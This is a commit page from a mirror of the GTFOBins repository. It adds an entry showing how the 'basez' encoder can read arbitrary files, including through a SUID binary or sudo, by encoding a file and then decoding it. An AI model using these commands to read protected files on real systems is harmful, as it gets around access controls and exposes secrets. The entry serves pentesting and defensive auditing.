1
0
mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2024-09-07 20:50:38 +02:00

Add basez

install: apt-get install -y basez
manual: https://manpages.ubuntu.com/manpages/impish/man1/basez.1.html
This commit is contained in:
Miguel R 2022-06-22 15:31:50 +02:00 committed by Andrea Cardaci
parent f4e32136aa
commit 2de683d35e

15
_gtfobins/basez.md Normal file
View File

@ -0,0 +1,15 @@
---
functions:
file-read:
- code: |
LFILE=file_to_read
basez "$LFILE" | basez --decode
suid:
- code: |
LFILE=file_to_read
./basez "$LFILE" | basez --decode
sudo:
- code: |
LFILE=file_to_read
sudo basez "$LFILE" | basez --decode
---